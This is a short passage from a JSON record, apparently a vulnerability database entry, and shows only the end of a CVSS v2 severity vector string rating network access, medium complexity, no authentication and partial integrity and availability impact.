"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}]}
